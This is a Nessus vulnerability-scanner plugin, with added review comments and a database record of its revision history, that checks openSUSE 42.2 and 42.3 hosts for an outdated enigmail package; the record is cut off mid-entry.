ID OPENSUSE-2017-1403.NASL Type nessus Reporter This script is Copyright (C) 2017 Tenable Network Security, Inc. Modified 2019-11-02T00:00:00
Description
This update for enigmail to version 1.9.9 fixes the following issues
(boo#1073858):
- Enigmail could be coerced to use a malicious PGP public
  key with a corresponding secret key controlled by an
  attacker
- Enigmail could have replayed encrypted content in
  partially encrypted e-mails, allowing a plaintext leak
- Enigmail could be tricked into displaying incorrect
  signature verification results
- Specially crafted content may cause denial of service
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from openSUSE Security Update openSUSE-2017-1403.
#
# The text description of this plugin is (C) SUSE LLC.
#
include("compat.inc");
# Metadata registration. When `description` is set, the script only declares
# its identity, advisory text and prerequisites, then leaves through the
# exit(0) at the end of this block, so the package check further down in the
# file is not reached on that pass.
if (description)
{
# Plugin identity and revision stamps.
script_id(105452);
script_version("$Revision: 3.1 $");
script_cvs_date("$Date: 2017/12/26 18:12:02 $");
script_name(english:"openSUSE Security Update : enigmail (openSUSE-2017-1403)");
script_summary(english:"Check for the openSUSE-2017-1403 patch");
script_set_attribute(
attribute:"synopsis",
value:"The remote openSUSE host is missing a security update."
);
# Advisory text. It lists four issue classes fixed by enigmail 1.9.9: use of
# an attacker-controlled public key, replay of encrypted content leading to a
# plaintext leak, incorrect signature verification display, and denial of
# service.
script_set_attribute(
attribute:"description",
value:
"This update for enigmail to version 1.9.9 fixes the following issues
(boo#1073858) :
- Enigmail could be coerced to use a malicious PGP public
key with a corresponding secret key controlled by an
attacker
- Enigmail could have replayed encrypted content in
partially encrypted e-mails, allowing a plaintext leak
- Enigmail could be tricked into displaying incorrect
signature verification results
- Specially crafted content may cause denial of service"
);
# The only external reference is the openSUSE Bugzilla entry.
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1073858"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected enigmail package."
);
# NOTE(review): risk_factor is "High", but this block sets no CVSS attribute
# and registers no CVE identifiers. Triage that filters on CVE id or on a CVSS
# threshold may therefore not surface this finding; track it by the advisory
# id (openSUSE-2017-1403) or the bug number (boo#1073858) instead.
script_set_attribute(attribute:"risk_factor", value:"High");
# Declared as a local check; the logic after this block reads Host/* KB items
# (release, RPM list, CPU) rather than probing a network service.
script_set_attribute(attribute:"plugin_type", value:"local");
# CPE tags: the enigmail package plus the two openSUSE Leap releases covered.
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:enigmail");
script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.2");
script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.3");
# The patch date precedes the plugin date by four days (2017/12/22 vs 2017/12/26).
script_set_attribute(attribute:"patch_publication_date", value:"2017/12/22");
script_set_attribute(attribute:"plugin_publication_date", value:"2017/12/26");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2017 Tenable Network Security, Inc.");
script_family(english:"SuSE Local Security Checks");
# Prerequisites. The four required KB keys are the same ones the check logic
# reads with get_kb_item(). Presumably ssh_get_info.nasl is what populates
# them from an authenticated session; confirm against that plugin.
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");
# Stop here on the description pass.
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Check logic: decide whether the scanned host is missing the enigmail update
# by comparing the collected RPM list against the fixed package build for each
# supported openSUSE release. audit() comes from audit.inc (not shown here);
# presumably each audit() call ends the script with a "does not apply" reason.

# Gate 1: local (authenticated) checks must have been enabled for this host.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
# Gate 2: the host must be openSUSE 42.2 or 42.3. SLED/SLES are rejected as
# "not openSUSE"; any other release string is rejected as an unsupported
# release. An audit-out here means the host was not evaluated, not that it is
# patched.
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
if (release !~ "^(SUSE42\.2|SUSE42\.3)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "42.2 / 42.3", release);
# Gate 3: the installed-package list must have been collected.
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
# Gate 4: only i586 / i686 / x86_64 hosts are evaluated.
# NOTE(review): the rpm_check() calls below pass no cpu argument, so hosts on
# other architectures are skipped by this gate rather than checked. Treat that
# as a coverage gap to confirm if such hosts exist in scope.
ourarch = get_kb_item("Host/cpu");
if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);
# flag counts how many rpm_check() calls reported a hit. Both calls are always
# made; neither is skipped when the other one hits.
flag = 0;
# Fixed builds per release: enigmail-1.9.9-2.13.1 on 42.2, enigmail-1.9.9-9.1
# on 42.3. Presumably rpm_check() (rpm.inc, not shown) returns true when the
# installed package is older than the reference; confirm in rpm.inc.
# NOTE(review): only the RPM package named "enigmail" is evaluated. A copy of
# the add-on installed outside RPM (for example per-user in a mail client
# profile) would not be seen by this check; verify such installs separately.
if ( rpm_check(release:"SUSE42.2", reference:"enigmail-1.9.9-2.13.1") ) flag++;
if ( rpm_check(release:"SUSE42.3", reference:"enigmail-1.9.9-9.1") ) flag++;
if (flag)
{
# At least one hit: raise the finding on port 0. The package report from
# rpm_report_get() is attached only when report_verbosity is above 0.
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
}
else
{
# No hit: use pkg_tests_get() to tell "tested and not affected" apart from
# "enigmail not installed".
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "enigmail");
}
{"id": "OPENSUSE-2017-1403.NASL", "bulletinFamily": "scanner", "title": "openSUSE Security Update : enigmail (openSUSE-2017-1403)", "description": "This update for enigmail to version 1.9.9 fixes the following issues\n(boo#1073858) :\n\n - Enigmail could be coerced to use a malicious PGP public\n key with a corresponding secret key controlled by an\n attacker\n\n - Enigmail could have replayed encrypted content in\n partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect\n signature verification results\n\n - Specially crafted content may cause denial of service", "published": "2017-12-26T00:00:00", "modified": "2019-11-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.tenable.com/plugins/nessus/105452", "reporter": "This script is Copyright (C) 2017 Tenable Network Security, Inc.", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1073858"], "cvelist": [], "type": "nessus", "lastseen": "2019-11-01T03:01:30", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:novell:opensuse:42.3", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:enigmail"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This update for enigmail to version 1.9.9 fixes the following issues\n(boo#1073858) :\n\n - Enigmail could be coerced to use a malicious PGP public\n key with a corresponding secret key controlled by an\n attacker\n\n - Enigmail could have replayed encrypted content in\n partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect\n signature verification results\n\n - Specially crafted content may cause denial of service", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-01-16T20:30:41", "references": [{"idList": ["SUSE_SU-2016-3286-1.NASL", "FEDORA_2016-E523C37B4D.NASL", "OPENSUSE-2017-58.NASL", "OPENSUSE-2016-1403.NASL", "OPENSUSE-2016-1373.NASL", 
"UBUNTU_USN-3143-1.NASL", "FEDORA_2016-4F34F26649.NASL", "OPENSUSE-2016-1277.NASL", "FREEBSD_PKG_28BB6EE59B5C11E6B79919BEF72F4B7C.NASL", "GENTOO_GLSA-201701-28.NASL"], "type": "nessus"}, {"idList": ["OPENVAS:1361412562310809971", "OPENVAS:1361412562310872045", "OPENVAS:1361412562310809973", "OPENVAS:1361412562310842966", "OPENVAS:1361412562310872067", "OPENVAS:1361412562310809911", "OPENVAS:1361412562310809928", "OPENVAS:1361412562310810103"], "type": "openvas"}, {"idList": ["GLSA-201701-28"], "type": "gentoo"}]}, "score": {"value": 5.0, "vector": "NONE"}}, "hash": "728123704d229c5a813e741b5c23feb63247528cfd6af0d631b6f86939ce048b", "hashmap": [{"hash": "3487ad13e00e4e90d860294ed8b233be", "key": "published"}, {"hash": "dcd374620f55089e90475444843870c7", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3c82f25bf837b29ecb737f895c32996b", "key": "references"}, {"hash": "3487ad13e00e4e90d860294ed8b233be", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "c36d97390a7f025c98d5b1a13740d009", "key": "pluginID"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "417b09c709f67767e29fa2d2bff8400a", "key": "href"}, {"hash": "924361c4dc424b356a38cd5a5e0408de", "key": "description"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "29f203d0c2ab07cf580e42855d9987f8", "key": "title"}, {"hash": "3534a67c2a45e8693917a1aa029c2c8a", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=105452", "id": "OPENSUSE-2017-1403.NASL", "lastseen": "2019-01-16T20:30:41", "modified": "2017-12-26T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "105452", "published": "2017-12-26T00:00:00", "references": 
["https://bugzilla.opensuse.org/show_bug.cgi?id=1073858"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1403.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105452);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2017/12/26 18:12:02 $\");\n\n script_name(english:\"openSUSE Security Update : enigmail (openSUSE-2017-1403)\");\n script_summary(english:\"Check for the openSUSE-2017-1403 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for enigmail to version 1.9.9 fixes the following issues\n(boo#1073858) :\n\n - Enigmail could be coerced to use a malicious PGP public\n key with a corresponding secret key controlled by an\n attacker\n\n - Enigmail could have replayed encrypted content in\n partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect\n signature verification results\n\n - Specially crafted content may cause denial of service\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1073858\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected enigmail package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:enigmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"enigmail-1.9.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"enigmail-1.9.9-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"enigmail\");\n}\n", "title": "openSUSE Security Update : enigmail (openSUSE-2017-1403)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 2, "lastseen": "2019-01-16T20:30:41"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:novell:opensuse:42.3", 
"cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:enigmail"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This update for enigmail to version 1.9.9 fixes the following issues (boo#1073858) :\n\n - Enigmail could be coerced to use a malicious PGP public key with a corresponding secret key controlled by an attacker\n\n - Enigmail could have replayed encrypted content in partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect signature verification results\n\n - Specially crafted content may cause denial of service", "edition": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "7b994fd8c9dc6bbc99dcad34611ee0d6a47fb1bcc9c9ccd05c9f4b8e43067886", "hashmap": [{"hash": "3487ad13e00e4e90d860294ed8b233be", "key": "published"}, {"hash": "dcd374620f55089e90475444843870c7", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3c82f25bf837b29ecb737f895c32996b", "key": "references"}, {"hash": "3487ad13e00e4e90d860294ed8b233be", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "c36d97390a7f025c98d5b1a13740d009", "key": "pluginID"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "417b09c709f67767e29fa2d2bff8400a", "key": "href"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "7f89b3e748296955b42e2a02729b1b80", "key": "description"}, {"hash": "29f203d0c2ab07cf580e42855d9987f8", "key": "title"}, {"hash": "3534a67c2a45e8693917a1aa029c2c8a", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=105452", "id": "OPENSUSE-2017-1403.NASL", "lastseen": "2017-12-27T12:55:54", "modified": "2017-12-26T00:00:00", "naslFamily": "SuSE Local Security Checks", 
"objectVersion": "1.3", "pluginID": "105452", "published": "2017-12-26T00:00:00", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1073858"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1403.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105452);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2017/12/26 18:12:02 $\");\n\n script_name(english:\"openSUSE Security Update : enigmail (openSUSE-2017-1403)\");\n script_summary(english:\"Check for the openSUSE-2017-1403 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for enigmail to version 1.9.9 fixes the following issues\n(boo#1073858) :\n\n - Enigmail could be coerced to use a malicious PGP public\n key with a corresponding secret key controlled by an\n attacker\n\n - Enigmail could have replayed encrypted content in\n partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect\n signature verification results\n\n - Specially crafted content may cause denial of service\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1073858\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected enigmail package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:enigmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"enigmail-1.9.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"enigmail-1.9.9-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"enigmail\");\n}\n", "title": "openSUSE Security Update : enigmail (openSUSE-2017-1403)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 1, "lastseen": "2017-12-27T12:55:54"}, {"bulletin": {"bulletinFamily": 
"scanner", "cpe": ["cpe:/o:novell:opensuse:42.3", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:enigmail"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This update for enigmail to version 1.9.9 fixes the following issues (boo#1073858) :\n\n - Enigmail could be coerced to use a malicious PGP public key with a corresponding secret key controlled by an attacker\n\n - Enigmail could have replayed encrypted content in partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect signature verification results\n\n - Specially crafted content may cause denial of service", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-02-21T01:34:42", "references": [{"idList": ["OPENVAS:1361412562310872045", "OPENVAS:1361412562310842966", "OPENVAS:1361412562310872067"], "type": "openvas"}, {"idList": ["RHSA-2017:0002"], "type": "redhat"}, {"idList": ["SUSE_SU-2016-3286-1.NASL", "FEDORA_2016-E523C37B4D.NASL", "OPENSUSE-2017-58.NASL", "SUSE_SU-2016-2898-1.NASL", "OPENSUSE-2016-1403.NASL", "OPENSUSE-2016-1373.NASL", "UBUNTU_USN-3143-1.NASL", "SUSE_SU-2016-3287-1.NASL", "FEDORA_2016-4F34F26649.NASL", "GENTOO_GLSA-201701-28.NASL"], "type": "nessus"}, {"idList": ["THREATPOST:893B03F04798265D72F00A7762693EAD", "THREATPOST:CBFAA2319AF4281EC1DD5C4682601942"], "type": "threatpost"}, {"idList": ["USN-3143-1"], "type": "ubuntu"}, {"idList": ["MSF:EXPLOIT/LINUX/HTTP/TRENDMICRO_IMSVA_WIDGET_EXEC"], "type": "metasploit"}, {"idList": ["GLSA-201701-28"], "type": "gentoo"}]}, "score": {"modified": "2019-02-21T01:34:42", "value": 1.2, "vector": "NONE"}}, "hash": "7b994fd8c9dc6bbc99dcad34611ee0d6a47fb1bcc9c9ccd05c9f4b8e43067886", "hashmap": [{"hash": "3487ad13e00e4e90d860294ed8b233be", "key": "published"}, {"hash": "dcd374620f55089e90475444843870c7", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3c82f25bf837b29ecb737f895c32996b", "key": 
"references"}, {"hash": "3487ad13e00e4e90d860294ed8b233be", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "c36d97390a7f025c98d5b1a13740d009", "key": "pluginID"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "417b09c709f67767e29fa2d2bff8400a", "key": "href"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "7f89b3e748296955b42e2a02729b1b80", "key": "description"}, {"hash": "29f203d0c2ab07cf580e42855d9987f8", "key": "title"}, {"hash": "3534a67c2a45e8693917a1aa029c2c8a", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=105452", "id": "OPENSUSE-2017-1403.NASL", "lastseen": "2019-02-21T01:34:42", "modified": "2017-12-26T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "105452", "published": "2017-12-26T00:00:00", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1073858"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1403.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105452);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2017/12/26 18:12:02 $\");\n\n script_name(english:\"openSUSE Security Update : enigmail (openSUSE-2017-1403)\");\n script_summary(english:\"Check for the openSUSE-2017-1403 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for enigmail to version 1.9.9 fixes the following issues\n(boo#1073858) :\n\n - Enigmail 
could be coerced to use a malicious PGP public\n key with a corresponding secret key controlled by an\n attacker\n\n - Enigmail could have replayed encrypted content in\n partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect\n signature verification results\n\n - Specially crafted content may cause denial of service\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1073858\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected enigmail package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:enigmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", 
release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"enigmail-1.9.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"enigmail-1.9.9-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"enigmail\");\n}\n", "title": "openSUSE Security Update : enigmail (openSUSE-2017-1403)", "type": "nessus", "viewCount": 0}, "differentElements": ["description", "reporter", "modified", "href"], "edition": 3, "lastseen": "2019-02-21T01:34:42"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:novell:opensuse:42.3", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:enigmail"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This update for enigmail to version 1.9.9 fixes the following issues\n(boo#1073858) :\n\n - Enigmail could be coerced to use a malicious PGP public\n key with a corresponding secret key controlled by an\n attacker\n\n - Enigmail could have replayed encrypted content in\n partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect\n signature verification results\n\n - Specially crafted content may cause denial of service", "edition": 4, "enchantments": {"dependencies": {"modified": "2019-10-28T20:48:23", "references": [{"idList": ["OPENVAS:1361412562310704469", "OPENVAS:1361412562310876390"], "type": "openvas"}, {"idList": ["ELSA-2018-3041", "ELSA-2019-4702", "ELSA-2019-4713", "ELSA-2019-4732"], "type": "oraclelinux"}, {"idList": 
["THREATPOST:CBFAA2319AF4281EC1DD5C4682601942"], "type": "threatpost"}, {"idList": ["DEBIAN:DSA-4469-1:B9B08"], "type": "debian"}, {"idList": ["KB4494441"], "type": "mskb"}, {"idList": ["DEBIAN_DSA-4469.NASL", "REDHAT-RHSA-2019-1190.NASL", "SUSE_SU-2016-2898-1.NASL", "SUSE_SU-2019-1287-1.NASL", "REDHAT-RHSA-2019-1170.NASL", "EULEROS_SA-2019-1588.NASL", "EULEROS_SA-2019-1586.NASL"], "type": "nessus"}, {"idList": ["RHSA-2019:1190", "RHSA-2019:1170"], "type": "redhat"}, {"idList": ["MSF:EXPLOIT/LINUX/HTTP/IMPERVA_SECURESPHERE_EXEC"], "type": "metasploit"}]}, "score": {"modified": "2019-10-28T20:48:23", "value": 1.2, "vector": "NONE"}}, "hash": "198060f1b77f4025f2de55a3171cc64e4d6d7eeac61f19e17754ad932a69b099", "hashmap": [{"hash": "3487ad13e00e4e90d860294ed8b233be", "key": "published"}, {"hash": "dcd374620f55089e90475444843870c7", "key": "sourceData"}, {"hash": "3c82f25bf837b29ecb737f895c32996b", "key": "references"}, {"hash": "58e6fa5c9fa960c7b16faef32456c3e2", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "7e4308681efd8978171e2f0d2dab8b79", "key": "reporter"}, {"hash": "c36d97390a7f025c98d5b1a13740d009", "key": "pluginID"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": 